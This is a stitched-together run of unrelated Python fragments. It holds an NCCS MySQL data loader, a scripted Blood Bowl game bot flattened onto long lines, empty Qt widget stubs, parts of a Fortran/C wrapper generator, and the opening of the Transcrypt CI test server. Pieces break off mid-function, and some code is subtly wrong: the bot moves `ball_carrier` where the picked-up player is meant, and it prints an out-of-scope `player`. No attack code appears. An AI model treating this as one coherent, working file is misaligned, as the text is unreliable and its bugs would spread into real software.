            df = pd.read_sql('SELECT {} FROM {}'.format(sql_cols, fname), con=con, index_col=index_col)
            df.columns = [c.upper() for c in df.columns.values]
            if match_dtypes is not None:
                self.main.logger.info(' standardizing dtypes for {}...'.format(fname))
                def _dtype_matcher(c):
                    # Coerce each column to the dtype of the same-named
                    # column in match_dtypes; default to str otherwise.
                    if c.name in match_dtypes.columns:
                        desired_type = match_dtypes[c.name].dtype.type
                        if desired_type is np.object_:
                            return c.astype(str)
                        elif desired_type in [np.float64, np.int64, np.float32, np.int32]:
                            return pd.to_numeric(c, errors='coerce').fillna(0)
                        else:
                            return c.astype(str) #assume strings for anything else (e.g. dates)
                            #raise Exception('Unknown dtype: {}, {}'.format(c.name, desired_type))
                    else:
                        return c.astype(str)
                df = df.apply(_dtype_matcher) #this is not very efficient, but I haven't found a better way to make sure all dtypes match from SQL
            df.to_csv(os.path.join(file_path, fname+'.csv'), index=df.index.name is not None)
        else:
            raise Exception('No active connection to NCCS MySQL database, and file not found in downloads/nccs folder: {}'.format(fname))

        self.sql_cache[fname] = df #save all dataframes loaded from sql in case they are needed later, because sql load times are slow
        if cols == '*':
            return df
        else:
            return df.loc[:, [c.upper() for c in cols if c.upper() != 'EIN']]
+ 2: path = pf.get_safest_path(game, player, game.get_ball_position()) if path is not None: p = game.get_pickup_prob(player, game.get_ball_position(), allow_team_reroll=True) p = path.prob * p if pickup_p is None or p > pickup_p: pickup_p = p pickup_player = player pickup_path = path if pickup_player is not None and pickup_p > 0.33: self.actions.append(Action(ActionType.START_MOVE, player=pickup_player)) if not pickup_player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in pickup_path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) #print(f"Pick up the ball with {pickup_player.role.name}, p={pickup_p}") # Find safest path towards endzone if game.num_tackle_zones_at(pickup_player, game.get_ball_position()) == 0: paths = pf.get_all_paths(game, pickup_player, from_position=game.get_ball_position(), num_moves_used=len(pickup_path)) best_path = None best_distance = 100 target_x = game.get_opp_endzone_x(self.my_team) for path in paths: distance_to_endzone = abs(target_x - path.steps[-1].x) if path.prob == 1 and (best_path is None or distance_to_endzone < best_distance): best_path = path best_distance = distance_to_endzone if best_path is not None: steps = [] for step in best_path.steps: if game.num_tackle_zones_at(pickup_player, step) > 0: break if len(steps) + len(pickup_path.steps) >= pickup_player.get_ma(): break steps.append(step) if len(steps) > 0: self.actions.append(Action(ActionType.START_MOVE, player=ball_carrier)) for step in steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"- Move ball carrier {pickup_player.role.name}") return # Scan for unused players that are not marked open_players = [] for player in self.my_team.players: if player.position is not None and not player.state.used and game.num_tackle_zones_in(player) == 0: open_players.append(player) print("5. 
Move receivers into scoring distance if not already") for player in open_players: if player.has_skill(Skill.CATCH) and player != ball_carrier: if game.get_distance_to_endzone(player) > player.num_moves_left(): continue paths = pf.get_all_paths(game, ball_carrier) best_path = None best_distance = 100 target_x = game.get_opp_endzone_x(self.my_team) for path in paths: distance_to_endzone = abs(target_x - path.steps[-1].x) if path.prob == 1 and (best_path is None or distance_to_endzone < best_distance): best_path = path best_distance = distance_to_endzone if best_path is not None: steps = [] for step in best_path.steps: if len(steps) >= player.get_ma() + (3 if not player.state.up else 0): break if game.num_tackle_zones_at(player, step) > 0: break if step.distance(best_path.steps[-1]) < player.get_ma(): break steps.append(step) if len(steps) > 0: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Move receiver {player.role.name}") return print("6. 
Blitz with open block players") if game.is_blitz_available(): best_blitz_attacker = None best_blitz_defender = None best_blitz_score = None best_blitz_path = None for blitzer in open_players: if blitzer.position is not None and not blitzer.state.used and blitzer.has_skill(Skill.BLOCK): blitz_paths = pf.get_all_paths(game, blitzer, blitz=True) for path in blitz_paths: final_position = path.steps[-1] if len(path) > 0 else blitzer.position for defender in game.get_adjacent_players(final_position, team=game.get_opp_team(blitzer.team)): p_self, p_opp, p_fumble_self, p_fumble_opp = game.get_blitz_probs(blitzer, final_position, defender) p_self_up = path.prob * (1-p_self) p_opp = path.prob * p_opp p_fumble_opp = p_fumble_opp * path.prob if blitzer == game.get_ball_carrier(): p_fumble_self = path.prob + (1 - path.prob) * p_fumble_self score = p_self_up + p_opp + p_fumble_opp - p_fumble_self if best_blitz_score is None or score > best_blitz_score: best_blitz_attacker = blitzer best_blitz_defender = defender best_blitz_score = score best_blitz_path = path if best_blitz_attacker is not None and best_blitz_score >= 1.25: self.actions.append(Action(ActionType.START_BLITZ, player=best_blitz_attacker)) if not best_blitz_attacker.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in best_blitz_path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) self.actions.append(Action(ActionType.BLOCK, position=best_blitz_defender.position)) print(f"Blitz with {best_blitz_attacker.role.name}, score={best_blitz_score}") return print("7. 
Make cage around ball carrier") cage_positions = [ Square(game.get_ball_position().x - 1, game.get_ball_position().y - 1), Square(game.get_ball_position().x + 1, game.get_ball_position().y - 1), Square(game.get_ball_position().x - 1, game.get_ball_position().y + 1), Square(game.get_ball_position().x + 1, game.get_ball_position().y + 1) ] if ball_carrier is not None: for cage_position in cage_positions: if game.get_player_at(cage_position) is None and not game.is_out_of_bounds(cage_position): for player in open_players: if player == ball_carrier or player.position in cage_positions: continue if player.position.distance(cage_position) > player.num_moves_left(): continue if game.num_tackle_zones_in(player) > 0: continue path = pf.get_safest_path(game, player, cage_position) if path is not None and path.prob > 0.94: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Make cage around towards ball carrier {player.role.name}") return # Scan for assist positions assist_positions = [] for player in game.get_opp_team(self.my_team).players: if player.position is None or not player.state.up: continue opponents = game.get_adjacent_opponents(player, down=False) for opponent in opponents: att_str, def_str = game.get_block_strengths(player, opponent) if def_str >= att_str: for open_position in game.get_adjacent_squares(player.position, occupied=False): if len(game.get_adjacent_players(open_position, team=self.opp_team, down=False)) == 1: assist_positions.append(open_position) print("8. 
Move non-marked players to assist") for player in open_players: for assist_position in assist_positions: path = pf.get_safest_path(game, player, assist_position) if path is not None and path.prob == 1: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Move assister {player.role.name} to {assist_position.to_json}") return print("9. Move towards the ball") for player in open_players: if player == ball_carrier: continue if game.num_tackle_zones_in(player) > 0: continue if ball_carrier is None: path = pf.get_safest_path(game, player, game.get_ball_position()) elif ball_carrier.team != self.my_team: path = pf.get_safest_path_to_player(game, player, ball_carrier) else: continue if path is not None: steps = [] for step in path.steps: if len(steps) >= player.get_ma() + (3 if not player.state.up else 0): break if ball_carrier is not None and ball_carrier.team == self.my_team and step in game.get_adjacent_squares(ball_carrier.position): break steps.append(step) if game.num_tackle_zones_at(player, step) > 0: break if len(steps) > 0: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Move towards ball {player.role.name}") return print("10. Risky blocks") attacker, defender, p_self_up, p_opp_down, block_p_fumble_self, block_p_fumble_opp = self._get_safest_block(game) if attacker is not None and (p_opp_down > (1-p_self_up) or block_p_fumble_opp > 0): self.actions.append(Action(ActionType.START_BLOCK, player=attacker)) self.actions.append(Action(ActionType.BLOCK, position=defender.position)) print(f"Block with {player.role.name} -> {defender.role.name}, p_self_up={p_self_up}, p_opp_down={p_opp_down}") return print("11. 
End turn") self.actions.append(Action(ActionType.END_TURN)) def _get_safest_block(self, game): block_attacker = None block_defender = None block_p_self_up = None block_p_opp_down = None block_p_fumble_self = None block_p_fumble_opp = None for attacker in self.my_team.players: if attacker.position is not None and not attacker.state.used and attacker.state.up: for defender in game.get_adjacent_opponents(attacker, down=False): p_self, p_opp, p_fumble_self, p_fumble_opp = game.get_block_probs(attacker, defender) p_self_up = (1-p_self) if block_p_self_up is None or (p_self_up > block_p_self_up and p_opp >= p_fumble_self): block_p_self_up = p_self_up block_p_opp_down = p_opp block_attacker = attacker block_defender = defender block_p_fumble_self = p_fumble_self block_p_fumble_opp = p_fumble_opp return block_attacker, block_defender, block_p_self_up, block_p_opp_down, block_p_fumble_self, block_p_fumble_opp def quick_snap(self, game): return Action(ActionType.END_TURN) def blitz(self, game): return Action(ActionType.END_TURN) def player_action(self, game): # Execute planned actions if any if len(self.actions) > 0: action = self._get_next_action() return action ball_carrier = game.get_ball_carrier() if ball_carrier == game.get_active_player(): td_path = pf.get_safest_path_to_endzone(game, ball_carrier) if td_path is not None and td_path.prob <= 0.9: self.actions.append(Action(ActionType.START_MOVE, player=ball_carrier)) for step in td_path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) #print(f"Scoring with {ball_carrier.role.name}, p={td_path.prob}") return return Action(ActionType.END_PLAYER_TURN) def block(self, game): """ Select block die or reroll. 
""" # Get attacker and defender attacker = game.get_procedure().attacker defender = game.get_procedure().defender is_blitz = game.get_procedure().blitz dice = game.num_block_dice(attacker, defender, blitz=is_blitz) # Loop through available dice results actions = set() for action_choice in game.state.available_actions: actions.add(action_choice.action_type) # 1. DEFENDER DOWN if ActionType.SELECT_DEFENDER_DOWN in actions: return Action(ActionType.SELECT_DEFENDER_DOWN) if ActionType.SELECT_DEFENDER_STUMBLES in actions and not (defender.has_skill(Skill.DODGE) and not attacker.has_skill(Skill.TACKLE)): return Action(ActionType.SELECT_DEFENDER_STUMBLES) if ActionType.SELECT_BOTH_DOWN in actions and not defender.has_skill(Skill.BLOCK) and attacker.has_skill(Skill.BLOCK): return Action(ActionType.SELECT_BOTH_DOWN) # 2. BOTH DOWN if opponent carries the ball and doesn't have block if ActionType.SELECT_BOTH_DOWN in actions and game.get_ball_carrier() == defender and not defender.has_skill(Skill.BLOCK): return Action(ActionType.SELECT_BOTH_DOWN) # 3. USE REROLL if defender carries the ball if ActionType.USE_REROLL in actions and game.get_ball_carrier() == defender: return Action(ActionType.USE_REROLL) # 4. PUSH if ActionType.SELECT_DEFENDER_STUMBLES in actions: return Action(ActionType.SELECT_DEFENDER_STUMBLES) if ActionType.SELECT_PUSH in actions: return Action(ActionType.SELECT_PUSH) # 5. BOTH DOWN if ActionType.SELECT_BOTH_DOWN in actions: return Action(ActionType.SELECT_BOTH_DOWN) # 6. USE REROLL to avoid attacker down unless a one-die block if ActionType.USE_REROLL in actions and dice > 1: return Action(ActionType.USE_REROLL) # 7. ATTACKER DOWN if ActionType.SELECT_ATTACKER_DOWN in actions: return Action(ActionType.SELECT_ATTACKER_DOWN) def push(self, game): """ Select square to push to. 
""" # Loop through available squares for position in game.state.available_actions[0].positions: return Action(ActionType.PUSH, position=position) def follow_up(self, game): """ Follow up or not. ActionType.FOLLOW_UP must be used together with a position. """ player = game.state.active_player for position in game.state.available_actions[0].positions: # Always follow up if player.position != position: return Action(ActionType.FOLLOW_UP, position=position) def apothecary(self, game): """ Use apothecary? """ return Action(ActionType.USE_APOTHECARY) # return Action(ActionType.DONT_USE_APOTHECARY) def interception(self, game): """ Select interceptor. """ for action in game.state.available_actions: if action.action_type == ActionType.SELECT_PLAYER: for player, agi_rolls in zip(action.players, action.agi_rolls): return Action(ActionType.SELECT_PLAYER, player=player) return Action(ActionType.SELECT_NONE) def pass_action(self, game): """ Reroll or not. """ return Action(ActionType.USE_REROLL) # return Action(ActionType.DONT_USE_REROLL) def catch(self, game): """ Reroll or not. """ return Action(ActionType.USE_REROLL) # return Action(ActionType.DONT_USE_REROLL) def gfi(self, game): """ Reroll or not. """ return Action(ActionType.USE_REROLL) # return Action(ActionType.DONT_USE_REROLL) def dodge(self, game): """ Reroll or not. """
**kwargs): pass def count(*args, **kwargs): pass def dump(*args, **kwargs): pass def insertItem(*args, **kwargs): pass def insertStretch(*args, **kwargs): pass def invalidate(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def itemSpacing(*args, **kwargs): pass def orientation(*args, **kwargs): pass def removeAt(*args, **kwargs): pass def removeItem(*args, **kwargs): pass def setAlignment(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setItemSpacing(*args, **kwargs): pass def setOrientation(*args, **kwargs): pass def setSpacing(*args, **kwargs): pass def setStretchFactor(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def spacing(*args, **kwargs): pass def stretchFactor(*args, **kwargs): pass __new__ = None class QStackedLayout(QLayout): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addItem(*args, **kwargs): pass def addWidget(*args, **kwargs): pass def count(*args, **kwargs): pass def currentIndex(*args, **kwargs): pass def currentWidget(*args, **kwargs): pass def hasHeightForWidth(*args, **kwargs): pass def heightForWidth(*args, **kwargs): pass def insertWidget(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def minimumSize(*args, **kwargs): pass def setCurrentIndex(*args, **kwargs): pass def setCurrentWidget(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setStackingMode(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def stackingMode(*args, **kwargs): pass def takeAt(*args, **kwargs): pass def widget(*args, **kwargs): pass StackAll = None StackOne = None StackingMode = None __new__ = None currentChanged = None staticMetaObject = None widgetRemoved = None class QColorDialog(QDialog): def __init__(*args, **kwargs): """ x.__init__(...) 
initializes x; see help(type(x)) for signature """ pass def changeEvent(*args, **kwargs): pass def currentColor(*args, **kwargs): pass def done(*args, **kwargs): pass def open(*args, **kwargs): pass def options(*args, **kwargs): pass def selectedColor(*args, **kwargs): pass def setCurrentColor(*args, **kwargs): pass def setOption(*args, **kwargs): pass def setOptions(*args, **kwargs): pass def setVisible(*args, **kwargs): pass def testOption(*args, **kwargs): pass def customColor(*args, **kwargs): pass def customCount(*args, **kwargs): pass def getColor(*args, **kwargs): pass def setCustomColor(*args, **kwargs): pass def setStandardColor(*args, **kwargs): pass def standardColor(*args, **kwargs): pass ColorDialogOption = None ColorDialogOptions = None DontUseNativeDialog = None NoButtons = None ShowAlphaChannel = None __new__ = None colorSelected = None currentColorChanged = None staticMetaObject = None class QGraphicsAnchorLayout(QGraphicsLayout): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addAnchor(*args, **kwargs): pass def addAnchors(*args, **kwargs): pass def addCornerAnchors(*args, **kwargs): pass def anchor(*args, **kwargs): pass def count(*args, **kwargs): pass def horizontalSpacing(*args, **kwargs): pass def invalidate(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def removeAt(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setHorizontalSpacing(*args, **kwargs): pass def setSpacing(*args, **kwargs): pass def setVerticalSpacing(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def verticalSpacing(*args, **kwargs): pass __new__ = None class QLabel(QFrame): def __init__(*args, **kwargs): """ x.__init__(...) 
initializes x; see help(type(x)) for signature """ pass def alignment(*args, **kwargs): pass def buddy(*args, **kwargs): pass def changeEvent(*args, **kwargs): pass def clear(*args, **kwargs): pass def contextMenuEvent(*args, **kwargs): pass def event(*args, **kwargs): pass def focusInEvent(*args, **kwargs): pass def focusNextPrevChild(*args, **kwargs): pass def focusOutEvent(*args, **kwargs): pass def hasScaledContents(*args, **kwargs): pass def hasSelectedText(*args, **kwargs): pass def heightForWidth(*args, **kwargs): pass def indent(*args, **kwargs): pass def keyPressEvent(*args, **kwargs): pass def margin(*args, **kwargs): pass def minimumSizeHint(*args, **kwargs): pass def mouseMoveEvent(*args, **kwargs): pass def mousePressEvent(*args, **kwargs): pass def mouseReleaseEvent(*args, **kwargs): pass def movie(*args, **kwargs): pass def openExternalLinks(*args, **kwargs): pass def paintEvent(*args, **kwargs): pass def picture(*args, **kwargs): pass def pixmap(*args, **kwargs): pass def selectedText(*args, **kwargs): pass def selectionStart(*args, **kwargs): pass def setAlignment(*args, **kwargs): pass def setBuddy(*args, **kwargs): pass def setIndent(*args, **kwargs): pass def setMargin(*args, **kwargs): pass def setMovie(*args, **kwargs): pass def setNum(*args, **kwargs): pass def setOpenExternalLinks(*args, **kwargs): pass def setPicture(*args, **kwargs): pass def setPixmap(*args, **kwargs): pass def setScaledContents(*args, **kwargs): pass def setSelection(*args, **kwargs): pass def setText(*args, **kwargs): pass def setTextFormat(*args, **kwargs): pass def setTextInteractionFlags(*args, **kwargs): pass def setWordWrap(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def text(*args, **kwargs): pass def textFormat(*args, **kwargs): pass def textInteractionFlags(*args, **kwargs): pass def wordWrap(*args, **kwargs): pass __new__ = None linkActivated = None linkHovered = None staticMetaObject = None class QFormLayout(QLayout): def __init__(*args, 
**kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addItem(*args, **kwargs): pass def addRow(*args, **kwargs): pass def count(*args, **kwargs): pass def expandingDirections(*args, **kwargs): pass def fieldGrowthPolicy(*args, **kwargs): pass def formAlignment(*args, **kwargs): pass def getItemPosition(*args, **kwargs): pass def getLayoutPosition(*args, **kwargs): pass def getWidgetPosition(*args, **kwargs): pass def hasHeightForWidth(*args, **kwargs): pass def heightForWidth(*args, **kwargs): pass def horizontalSpacing(*args, **kwargs): pass def insertRow(*args, **kwargs): pass def invalidate(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def labelAlignment(*args, **kwargs): pass def labelForField(*args, **kwargs): pass def minimumSize(*args, **kwargs): pass def rowCount(*args, **kwargs): pass def rowWrapPolicy(*args, **kwargs): pass def setFieldGrowthPolicy(*args, **kwargs): pass def setFormAlignment(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setHorizontalSpacing(*args, **kwargs): pass def setItem(*args, **kwargs): pass def setLabelAlignment(*args, **kwargs): pass def setLayout(*args, **kwargs): pass def setRowWrapPolicy(*args, **kwargs): pass def setSpacing(*args, **kwargs): pass def setVerticalSpacing(*args, **kwargs): pass def setWidget(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def spacing(*args, **kwargs): pass def takeAt(*args, **kwargs): pass def verticalSpacing(*args, **kwargs): pass AllNonFixedFieldsGrow = None DontWrapRows = None ExpandingFieldsGrow = None FieldGrowthPolicy = None FieldRole = None FieldsStayAtSizeHint = None ItemRole = None LabelRole = None RowWrapPolicy = None SpanningRole = None WrapAllRows = None WrapLongRows = None __new__ = None staticMetaObject = None class QToolBox(QFrame): def __init__(*args, **kwargs): """ x.__init__(...) 
initializes x; see help(type(x)) for signature
        """
        pass
    # The methods below are auto-generated Qt API stubs: names and signatures
    # only, with intentionally empty bodies. Do not add logic here — these
    # should be regenerated from the Qt bindings, not edited by hand.
    def addItem(*args, **kwargs): pass
    def changeEvent(*args, **kwargs): pass
    def count(*args, **kwargs): pass
    def currentIndex(*args, **kwargs): pass
    def currentWidget(*args, **kwargs): pass
    def event(*args, **kwargs): pass
    def indexOf(*args, **kwargs): pass
    def insertItem(*args, **kwargs): pass
    def isItemEnabled(*args, **kwargs): pass
    def itemIcon(*args, **kwargs): pass
    def itemInserted(*args, **kwargs): pass
    def itemRemoved(*args, **kwargs): pass
    def itemText(*args, **kwargs): pass
    def itemToolTip(*args, **kwargs): pass
    def removeItem(*args, **kwargs): pass
    def setCurrentIndex(*args, **kwargs): pass
    def setCurrentWidget(*args, **kwargs): pass
    def setItemEnabled(*args, **kwargs): pass
result of old_node. old_node : FunctionNode Original function (wrap fortran). new_node : FunctionNode New function (wrap c) that passes arg. """ attrs = arg.attrs meta = arg.metaattrs c_attrs = new_node.ast.attrs f_attrs = old_node.ast.attrs if f_attrs["deref"] is None: f_attrs["deref"] = "allocatable" attrs["deref"] = "allocatable" old_node.ast.metaattrs["deref"] = "allocatable" meta["deref"] = "allocatable" for name in ["owner", "free_pattern"]: if c_attrs[name]: attrs[name] = c_attrs[name] del c_attrs[name] def result_as_arg(self, node, C_new): """ Create a Fortran function for a C function which has the result added as an argument. Create Fortran function without bufferify function_suffix but with len attributes on string arguments. char *out(); -> call out(result_as_arg) """ F_new = C_new.clone() # Fortran function should wrap the new C function F_new._PTR_F_C_index = C_new._function_index F_new.wrap.assign(fortran=True) # Do not add '_bufferify' F_new.fmtdict.function_suffix = node.fmtdict.function_suffix # Do not wrap original function (does not have result argument) node.wrap.fortran = False return F_new def process_return_this(self, node, ordered_functions): """Deal with return_this feature. If a function is marked return_this, convert it into a subroutine for the C and Fortran wrappers. Return this allows chaining of function calls. For example in C++: obj->doA()->doB(); Python: obj.doA().doB() However, there is no way to chain in C or Fortran. Clone the function and wrap for C and Fortran. Turn off C and Fortran wrapper on original node. Remove the function result. Parameters ---------- node : FunctionNode ordered_functions : list of FunctionNode """ if node.wrap.c == False and node.wrap.fortran == False: return new = node.clone() ordered_functions.append(new) self.append_function_index(new) new._generated = "return_this" # Only wrap for C and Fortran, transfer values from node. 
new.wrap.clear() new.wrap.c = node.wrap.c new.wrap.fortran = node.wrap.fortran node.wrap.c = False node.wrap.fortran = False # Do not return C++ this instance. new.ast.set_return_to_void() def arg_to_CFI(self, node, ordered_functions): """Look for functions which can use TS29113 Futher interoperability with C. If a function requires CFI_cdesc, clone the function and set arg.stmts_suffix to "cfi" to use the correct statements. The new function will be called by Fortran directly via the bind(C) interface. The original function no longer needs to be wrapped by Fortran; however, it will still be wrapped by C to provide a C API to a C++ function. Parameters ---------- node : FunctionNode ordered_functions : list of FunctionNode """ options = node.options fmt_func = node.fmtdict if options.wrap_fortran is False: # The buffer function is intended to be called by Fortran. # No Fortran, no need for buffer function. return ast = node.ast result_typemap = ast.typemap # shadow classes have not been added yet. # Only care about string, vector here. result_is_ptr = ast.is_indirect() if ( result_typemap and result_typemap.base in ["string", "vector"] and result_typemap.name != "char" and not result_is_ptr ): node.wrap.c = False # node.wrap.fortran = False self.config.log.write( "Skipping {}, unable to create C wrapper " "for function returning {} instance" " (must return a pointer or reference)." " Bufferify version will still be created.\n".format( result_typemap.cxx_type, ast.name ) ) ast = node.ast cfi_args = {} for arg in ast.params: cfi_args[arg.name] = False arg_typemap = arg.typemap if arg.metaattrs["assumed-rank"]: cfi_args[arg.name] = True elif arg_typemap.sgroup == "string": cfi_args[arg.name] = True elif arg_typemap.sgroup == "char": if arg.is_indirect(): cfi_args[arg.name] = True has_cfi_arg = any(cfi_args.values()) # Function result. 
has_string_result = False result_as_arg = "" # Only applies to string functions # when the result is added as an argument to the Fortran api. # Check if result needs to be an argument. attrs = ast.attrs if attrs["deref"] == "raw": # No bufferify required for raw pointer result. pass elif result_typemap.sgroup in ["char", "string"]: has_string_result = True result_as_arg = fmt_func.F_string_result_as_arg result_name = result_as_arg or fmt_func.C_string_result_as_arg if not (has_cfi_arg or has_string_result): return False options.wrap_fortran = False # Create a new C function and change arguments # and add attributes. C_new = node.clone() ordered_functions.append(C_new) self.append_function_index(C_new) generated_suffix = "cfi" C_new._generated = "arg_to_cfi" C_new.generated_suffix = generated_suffix # used to lookup fc_statements fmt_func = C_new.fmtdict fmt_func.function_suffix = fmt_func.function_suffix + fmt_func.C_cfi_suffix C_new.wrap.assign(c=True)#, fortran=True) C_new._PTR_C_CXX_index = node._function_index for arg in C_new.ast.params: attrs = arg.attrs arg_typemap = arg.typemap if cfi_args[arg.name]: arg.stmts_suffix = generated_suffix if arg_typemap.sgroup in ["char", "string"]: # Create local variable names to be used in statements. # TODO: move into metaattrs attrs["len"] = True attrs["len_trim"] = True ast = C_new.ast if has_string_result: f_attrs = node.ast.attrs # Fortran function attributes f_meta = node.ast.metaattrs # Fortran function attributes if ast.attrs["len"] or result_as_arg: # decl: const char * getCharPtr2() +len(30) # +len implies copying into users buffer. 
result_as_string = ast.result_as_arg(result_name) result_as_string.const = False # must be writeable attrs = result_as_string.attrs # attrs["len"] = options.C_var_len_template.format( # c_var=result_name # ) # Special case for wrapf.py to override "allocatable" f_attrs["deref"] = "result-as-arg" f_meta["deref"] = "result-as-arg" elif (result_typemap.sgroup == "string" or result_is_ptr): # 'char *' result_as_string = ast.result_as_arg(result_name) attrs = result_as_string.attrs self.move_arg_attributes(result_as_string, node, C_new) else: # char result_as_string = ast.result_as_arg(result_name) result_as_string.const = False # must be writeable attrs = result_as_string.attrs result_as_string.metaattrs["is_result"] = True C_new.ast.metaattrs["intent"] = None if result_as_arg: F_new = self.result_as_arg(node, C_new) ordered_functions.append(F_new) self.append_function_index(F_new) else: # Fortran function may call C subroutine if string/vector result # Fortran function calls bufferify function. node._PTR_F_C_index = C_new._function_index return True def arg_to_buffer(self, node, ordered_functions): """Look for function which have buffer arguments. This includes functions with string or vector arguments. If found then create a new C function that will add arguments buf_args (typically a buffer and length). String arguments added deref(allocatable) by default so that char * function will create an allocatable string in Fortran. Parameters ---------- node : FunctionNode ordered_functions : list of FunctionNode """ options = node.options fmt_func = node.fmtdict if node.wrap.c is False: # The user does not require a C wrapper. # This can be the case if the Fortran wrapper is doing all # the work via splicer or fstatements. return # If a C++ function returns a std::string instance, # the default wrapper will not compile since the wrapper # will be declared as char. It will also want to return the # c_str of a stack variable. Warn and turn off the wrapper. 
ast = node.ast result_typemap = ast.typemap # shadow classes have not been added yet. # Only care about string, vector here. result_is_ptr = ast.is_indirect() if ( result_typemap and result_typemap.base in ["string", "vector"] and result_typemap.name != "char" and not result_is_ptr ): node.wrap.c = False # node.wrap.fortran = False self.config.log.write( "Skipping {}, unable to create C wrapper " "for function returning {} instance" " (must return a pointer or reference)." " Bufferify version will still be created.\n".format( result_typemap.cxx_type, ast.name ) ) if node.wrap.fortran is False: # The buffer function is intended to be called by Fortran. # No Fortran, no need for buffer function. return if options.F_string_len_trim is False: # XXX what about vector? return # Arguments. # Is result or any argument a string or vector? # If so, additional arguments will be passed down so # create buffer version of function. has_buf_arg = False for arg in ast.params: arg_typemap = arg.typemap if arg_typemap.sgroup == "string": has_buf_arg = True elif arg_typemap.sgroup == "char": if arg.ftrim_char_in: pass elif arg.is_indirect(): has_buf_arg = True elif arg_typemap.sgroup == "vector": has_buf_arg = True elif (arg_typemap.sgroup == "native" and arg.metaattrs["intent"] == "out" and arg.get_indirect_stmt() in ["**", "*&"]): # arg.attrs["dimension"]: # double **values +intent(out) +dimension(nvalues) has_buf_arg = True # Function result. has_string_result = False has_vector_result = False need_cdesc_result = False result_as_arg = "" # Only applies to string functions # when the result is added as an argument to the Fortran api. # Check if result needs to be an argument. attrs = ast.attrs if attrs["deref"] == "raw": # No bufferify required for raw pointer result. 
pass elif result_typemap.sgroup in ["char", "string"]: has_string_result = True result_as_arg = fmt_func.F_string_result_as_arg result_name = result_as_arg or fmt_func.C_string_result_as_arg elif result_typemap.base == "vector": has_vector_result = True elif result_is_ptr: if attrs["deref"] in ["allocatable", "pointer"]: need_cdesc_result = True elif attrs["dimension"]: need_cdesc_result = True # Functions with these results need wrappers. if not (has_string_result or has_vector_result or need_cdesc_result or has_buf_arg): return
#!/usr/bin/env python3 """ Transcrypt CI testserver. Hit /index with a browser and you'll see what it does. In travis we hit it via `xvfb-run firefox \ http://127.0.0.1:8080/do/hello,time,transcrypt/dictionaries,...` This is to speed up CI testing: - phantomjs was no option, too much incompat with real browsers - starting firefox on each autotest.html files would have taken ages due to FF startup times (in headless CI envs) - so we keep FF open and redirect via js from test to test This can be easily made parallel by starting a few FFs and servers on different ports CAUTION: The full transcrypt/autotest.py does not run, so we allow to give seperate subfolders, for which we create then a ci.py autotest file and run that in the parent dir. ## Sequence of hits Call `/do/<tests>` via the browser and check the network log about the various requests. ## Tips 1. Search os.chdir in this module, we managed to run the tests only in their dirs. 1. `/chk/<test>` allows to analyse a single test, e.g. `/chk/transcrypt/dictionaries` 1. `/.fooo` is expanded to `/transcrypt/foo` as test name. """ import sys, os, time, subprocess, urllib, logging # make py2 >> py3: from imp import reload reload(sys) from bottle import route, run, template, request os.system ('python3.7 -m pip install mypy') # tests to run, filled in sys.argv: T = [] max_wait = 10 # then its error # single or multithreaded (latter required for dev mode, getting fs change # hits, while polling. Disadvantage: pip install paste required, not req. 
# for travis:
dev_mode = 0
test_end_marker = 'done'
# NOTE(review): this server is deliberately stateful — env/ctx/T below are
# mutated by the route handlers. I(), M(), G(), R(), info(), debug() are
# helpers presumably defined later in this file — verify.
env, j, exists = os.environ, os.path.join, os.path.exists
env['TZ'] = 'Europe/Berlin' # for browser and our transcypt -r
stop_flag = '/tmp/transcrypt_tester_stopflag'
# ctx tracks the currently running test and the tests already run:
ctx = {'cur_test': None, 'have_run': []}
# set some paths into our environ:
_ = os.path.abspath(__file__).rsplit
# /root/Transcrypt/transcrypt:
env['d_0'] = d0 = _('/', 3)[0]
runners = {'3.5': 'run_transcrypt35',
           '3.6': 'run_transcrypt36',
           '3.7': 'run_transcrypt37'}
avail_pyvers = []
for maj in '3.5', '3.6', '3.7':
    # python<maj> exists iff `python<maj> --version` prints anything:
    if os.popen('python%s --version 2>/dev/null' % maj).read():
        avail_pyvers.append(maj)
# /root/Transcrypt/transcrypt/development_cont.int:
env['d_i'] = _('/', 1)[0]
log_file = env['d_i'] + '/results.log'
env['d_at'] = d0 + '/development/automated_tests'
# default filesystem monitor command (entr + wget back into this server):
dflt_fs_mon = ('find "%s" -name "*.py" | entr -c '
               'wget -q "%%(FS_CHANGE_URL)s" -O -') % env['d_0']
env['TS_MON_CMD'] = os.environ.get('TS_MON_CMD', dflt_fs_mon)
# test flag sets, comma separated from env or CLI ('__' becomes a space,
# see run_t):
test_flags = ['-bnc__-da__-e__5', '-bnc__-da__-e__6']
html_tmpl = '''<html> <body> %s <script> %s </script> </body> </html>'''
